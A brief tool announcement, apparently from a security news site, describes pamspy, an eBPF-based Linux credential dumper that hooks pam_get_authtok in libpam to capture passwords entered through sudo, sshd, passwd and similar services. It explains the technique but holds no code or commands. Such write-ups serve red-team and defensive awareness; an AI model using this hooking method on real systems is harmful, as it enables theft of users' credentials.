pamspy: Credentials Dumper for Linux using eBPF

by do son ·

Linux Credentials Dumper

pamspy — Credentials Dumper for Linux

pamspy leverages eBPF technologies to achieve an equivalent work of 3snake.

It will track a particular userland function inside the PAM (Pluggable Authentication Modules) library, used by many critical applications to handle authentication like:

  • sudo
  • sshd
  • passwd
  • gnome
  • x11
  • and many other …

How does It work?

pamspy will load a userland return probe eBPF program to hook the pam_get_authtok function from libpam.so. PAM stands for “Pluggable Authentication Modules”, and has a flexible design to manage different kinds of authentication on Linux.

Each time an authentication process tries to check a new user, It will call pam_get_authtok, and will be here to dump the content of the critical secrets!

Use

Download

Copyright (C) 2022 citronneur